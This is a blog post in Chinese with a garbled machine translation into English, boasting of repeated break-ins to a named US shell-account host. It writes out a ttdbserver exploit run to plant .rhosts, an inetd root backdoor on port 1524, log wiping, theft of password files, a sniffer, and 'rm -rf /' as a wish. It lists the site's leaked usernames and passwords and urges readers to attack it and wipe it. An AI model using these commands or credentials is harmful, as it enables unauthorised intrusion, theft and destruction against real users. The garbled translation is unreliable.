analysist analysist
安全--到底是该由实战来检验呢? Security - in the end of the test from the real to it? 还是由口水来检验? Or by saliva to test? 这个问题对于某些人来说,确实可以争论得上或许几百年。 This problem for some people, can really get on the controversy may be hundreds of years. 俺可没有这个闲工夫,拿这些时间去提高一下自己的技术还好些。 Anke do not have this spare time, take the time to improve the technology yourself better.
可以这样说:如果没有当年Morris在UNIX的下的WORM,恐怕今天的各种病毒以及与WORM异曲同工、以消耗系统资源进而拖垮系统服务的DoS攻击等都不知要等到多少年之后才能出现;同样,如果没有当年的Finger攻击哪能引出今天那么多的Remote Exploits? 总之,机算机的安全恐怕还会停留在当时UNIX的那种login管理,drwxrwxrwx和系统进程空间用户进程空间井水不犯河水--越界就Core Dumped状态。 Can say this: if there had been a UNIX under the Morris WORM, I am afraid that today's viruses as well as similar WORM to consume system resources and thus caused the collapse of the system of services DoS attacks so I do not know until many years later to appear; the same If not then how can I Finger attack today leads to so many Remote Exploits? In short, the machine's computer security will probably stay at the time that the UNIX login management, drwxrwxrwx system process space and process space interfere with each user - - Core Dumped on cross-border state. 妈妈呀,这种安全机制,经过付出不菲的代价后,今天看来是何等的脆弱。 Mom Yeah, this security mechanism, after paying a high price today after what appears to be fragile.
喜欢做马谡的人啊,请不要那么自以为是。 Ma Su who like to do, ah, please do so self-righteous. 也许就有那么一天,当你的系统被搞垮掉的时候,你就等待着不仅仅是所有的人对你的嘲笑吧! Perhaps there will be a day when your system is out of the ruin, you will not just waiting for all the people laughed at it for you!
好了,言归正题。 Well, the words Reformed problem. 以下是俺经历过的一个美国站点,至于系统管理员,俺只能用“可恶”来形容。 I experienced the following is a U.S. site, as the system administrator, I can only use the "abominable" to describe.
io.jtan.com io.jtan.com
207.106.84.135 207.106.84.135
那是去年11月底的事。 That was the end of November last year, things. 一个偶然的机会,给俺扫到了这个地址,当然当时不是这个IP,给俺搅活了一阵,后来换成这个。 A chance to sweep to the address I, of course, was not the IP, I stir to live for a while, and later replaced this.
用 rpcinfo一看,呵呵,还开了不少RPC daemons, 乖乖,有这个机会俺可不能不试一下--当时正对美国佬炸馆义忿填膺的时候,狗日的.找一个老的Remote Exploit, 就ttdbserver(100083)吧,找个台湾的SUNOS机子做跳板,编译后 With rpcinfo to see, Oh, also opened a lot of RPC daemons, obediently, to have this opportunity Anke must try - Yankees bombing was being righteous anger filled Ying, the dog days. To find an old Remote Exploit, on ttdbserver (100083) it, to find a machine in Taiwan SUNOS a springboard, compiled
$./ttdb 207.106.84.135 "echo '+ +'>/usr/.rhosts;" $. / Ttdb 207.106.84.135 "echo '+ +'> / usr / .rhosts;"
呵呵,竟然攻击成功! Oh, even a successful attack!
看到这,如果你不去他们的www.jtan.com 上看还好,看过后,我想你如果是在美国的话,你绝对是不会花钱去用他们的shell站点的。 See this, if you do not watch their www.jtan.com better, read it and I think if you are in the United States, you definitely will not spend money to use their shell site. 这么破,还敢吹他们的shell帐号服务是安全的,也真厚。 Such a break, would be willing to blow their shell account services are secure, but also really thick. @#$%^! #$%^!
我是不会用 I will not use
$rlogin -l bin 207.106.84.135 $ Rlogin-l bin 207.106.84.135
上去的。 To their work.
还是下面的省事 Or following the easy way
$./ttdb 207.106.84.135 "echo 'ingreslock stream tcp nowait root /bin/sh sh $. / Ttdb 207.106.84.135 "echo 'ingreslock stream tcp nowait root / bin / sh sh
-i' > /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f /tmp/.x;" -I '> / tmp / .x; / usr / sbin / inetd-s / tmp / .x; rm-f / tmp / .x; "
然后 Then
$telnet 207.106.84.135 1524 $ Telnet 207.106.84.135 1524
#w # W
有root A root
简单打扫一下, Simple sweep,
#rm /core; # Rm / core;
#cp /dev/null /var/adm/messages; # Cp / dev / null / var / adm / messages;
#rm /usr/bin/.rhosts; # Rm / usr / bin / .rhosts;
#kill -9 XXXXXX (你的1524端口shell进程号) # Kill -9 XXXXXX (your shell process ID 1524 port)
抓取passwd, shadow, hosts文件 Grab passwd, shadow, hosts file
当时时间已很晚了,美国那边是白天,只好退出。 When time is late, the U.S. side during the day, had to quit.
第二天拿解出的普通用户密码从正门进入,也是用一个老的local exploit:ufsrestore, 竟然也拿到了root. 打扫完后,忍不住装了个sniffer。 The next day take the solution out of the ordinary user's password from the main entrance, but also with an old local exploit: ufsrestore, surprisingly got the root. After cleaning, could not help but installed a sniffer.
第三天上去,拿到了十几个本地用户的密码,和几个telnet到别的主机的用户密码。 On the third day up, get a dozen local user's password, and a few telnet to other host user password. 有鉴于是商业站点,好心发了个mail给系统管理员(TMD,真是好心过头了) In view of the commercial site, kindly sent a mail to the system administrator (TMD, is really kind too far)
我想系统管理员都这德性,比如说你试着用密码admin登录admin帐户,结果进去了。 I think the system administrator that virtue, for example, you try to use the password admin admin account, the results entered. 如果你好心报告给他的话,那么你的麻烦也就开始了。 If you kindly report to him, then your troubles will begin. 请相信我,这是定律。 Believe me, this is the law.
第四天上去,漏洞是补上了。 Fourth day, up, up on the vulnerability. 多余的RPC daemon也关掉了。 Excess RPC daemon is turned off.
$ls -la /usr/lib/fs/ufs/ufs* $ Ls-la / usr / lib / fs / ufs / ufs *
好,让我再试一下别的local exploit, 记得我有一个放在备用目录下, 好就运行它。 Well, let me try again another local exploit, I remember I had a backup directory on the good to run it.
$%BACKUP_DIR/my_ex $% BACKUP_DIR / my_ex
File not found. File not found.
ls -la %BACKUP_DIR/my_ex ls-la% BACKUP_DIR / my_ex
-rwxr-xr-x 23456 my_ex ..... -Rwxr-xr-x 23456 my_ex .....
明明在那里,怎么会not found? Obviously there, how could not found?
这时我的telnet进程被killed掉。 Then I was killed off the telnet process.
再telnet 207.106.84.135进入,一大堆警告垃极 Then telnet 207.106.84.135 entered, a lot of warnings refuse pole
换个跳板再Telnet, 以另一用户身分进入。 Another springboard and then Telnet, to another user ID to enter.
cat $BACKUP_DIR/my_exp cat $ BACKUP_DIR / my_exp
SHIT! 已被换成了Shell Scripts, 内容当然是有人运行该程序,就把当前的系统状态报告(EMAIL)给系统管理员! SHIT! Has been replaced with Shell Scripts, of course, was content to run the program, put the current system status report (EMAIL) to the system administrator! 可笑的是后面都用XXX来填满文件的原有长度。 The irony is that all the back to fill the file with the XXX original length.
查看一下该用户的mail, 有一封竟然是系统管理员如何如何历害发现内部有人在偷取用户密码,要求用户换改密码。 Look at the user's mail, there is even a system administrator to discover how to experience harm someone in the house to steal user passwords, require users to change the password change. 完全掩盖了系统不安全,被人潜入的真相。 Completely cover the system unsafe, was sneaked into the truth. 对用户太不负责了。 Responsible for the user too. @#$%! #$%! ,本来俺也就打算不玩了,看了之后,好! , Had I not also intend to play, and looked after, good! 有你这样的系统管理员,俺也乐着跟你逗一下。 Have you such a system administrator, I would be happy to stay with you a bit. 接下来直到今年二月底,是轮番的攻防战,俺也后悔跟他太明刀明枪了,几次拿到root之后都主动指明给他,也许是出于道德上的心里障碍,没有发Broadcasting email告知他们的用户。 Until the end of February next year, the turns of the battle, I also regret to him too openly, and several have taken the initiative to get after the specified root for him, perhaps out of a moral heart disorders, there is no hair Broadcasting email to inform them of the user. 也许是过分的好心,非但没有唤醒他们对用户的负责,反而从另一个角度是害了用户。 Perhaps too much of good intentions, not only did not awaken them to the user's responsibility, but from another point of view is detrimental to the user. 直到后来,所知的漏洞被他一一补上。 Until then, the vulnerability is known to make up his 11. 而我的愤怒,也逐步升级到真想拿到root后,来个 And my anger, and gradually upgrade to really want to get the root after, to a
# nohup rm -rf / & # Nohup rm-rf / &
把它给超度掉。 Put it out to salvation. 随着难度的提高,加上工作忙,也就不玩了近五个月。 With the increased difficulty, busy with work, and not playing for nearly five months. 君子报仇,十年不晚。 Get mad, no later than ten years. :) :)
昨晚突然心血潮,再Telnet上去看了一下。 Sudden influx of hard work last night, looked up and then Telnet. 妈呀! OMG! 不知在这五个月中,该站点得罪了何方神圣,除了给人DoS拖慢它的服务外,还或许是rm -rf / 过了。 I do not know that five months, offended the story behind the site, in addition to giving the DoS slow down its service, but also perhaps the rm-rf / before. 他们还到FBI报了案,但说不能指望FBI破案,要靠他们自己来搞定云云。 They also reported the matter to the FBI, but said the FBI solve the case can not be expected to rely on their own to get and so on. 也许实际情况比他们在email中所说给用户听的更为严重。 Perhaps the situation than they said in the email to the user to hear even more serious. 呵呵! Oh! 有人竞然帮俺超度了它,太不好玩了。 I was salvation race course to help it, too fun.
俺再用一个自己认为是个很臭的Exploit来弄它一下,我KAO, I then own that is a very smelly Exploit to get it a bit, I KAO,
# 这是什么? # What is this?
当时脑海里涌现了"rm -rf /"这个能够冲洗掉我的一切对那个系统管理员的愤怒的字符串。 At that time the emergence of mind "rm-rf /" This can be washed away all my anger on that system administrators the string. 也许是已经五个月了,愤怒的极点已经过去,也许是考虑到他已经得到了应有的惩罚。 May have been five months, and anger over the poles, perhaps considering he has been duly punished. 总之是“心太软”,我没有这样做。 In short, "the heart", I did not do.
后来,在寻找xferlog的时候给他追到了。 Later, when looking for xferlog catch up to him. 原来“他”--也许是雇了“高手”坐镇,在用户登录后运行的.profile里面放了通知“他”的Shell Script, 这一点可以值得借鉴。 The original "he" - perhaps hired "expert" sits, running after the user logs on. Profile which has a notice "his" Shell Script, which can be learned from. 所以每一用户登录,“他”都会立刻知道。 Therefore, each user logs on, "he" will immediately know.
攻难守易,尤其是在机算机的安全方面。 Easy to attack and hard to defend, especially in the local computer's security. 不知各位是否同意? I wonder if you agree?
反正今晚我再上去的时候,还被“他”DoS了我的跳板站点,telnet特慢。 Anyway, tonight when I go up again, also "he" DoS springboard for my site, telnet particularly slow. -- 说人家干那事,“卿卿”原来也再干那事。 - Something that people do that, "Grief" So also press on that matter. 美国佬,真TM虚伪无耻! Americans, true TM shameless hypocrisy!
以下是该站点的一些资料,功夫可以的朋友,不妨到那里实战一下,绝对是一个很好的练兵场。 The following is some information on the site, effort can be friends, we might go there real, and definitely is a good training grounds. 同时请各位要注意保护好自己。 Also you need to protect yourself. 水平欠佳的朋友千万别试。 The level of poor friends do not try.
io.jtan.com io.jtan.com
207.106.84.135 207.106.84.135
SUNOS 5.5.1 SUNOS 5.5.1
N:bet N: bet
P:bet P: bet
N:home N: home
P:home P: home
N:jo N: jo
P:tomster P: tomster
.profile 中的sendmail alert@jtan.com 为发email通知系统管理员chris . Profile in the sendmail alert@jtan.com notify the system administrator to send email chris
$cat /etc/aliases $ Cat / etc / aliases
可以看到各个管理员的ID。 The administrator can see all the ID.
注意:用户进入后用的是ksh Note: After entering the user is ksh with
$mail 应该可看到我提到的信。 $ Mail should be able to see the letter I mentioned.
对该系统有何心得,不妨拿到这来交流交流。 What experience of the system, we might get to share this exchange. 有利大家的提高。 Improve everyone's benefit. 请注意他们是否拥有跟踪login到跳板机器的技术。 Please note that they have tracked a springboard to login to the machine technology. 拿到root后,请别忘了告诉俺。 Get the root, please do not forget to tell I. 我想到时,你会量变到要来个“rm -rf /”的。 I think, you will want to come to a quantitative change to "rm-rf /" to. 不然的话,会象俺那么后悔。 Otherwise, as I will regret it.
Tidak ada komentar:
Posting Komentar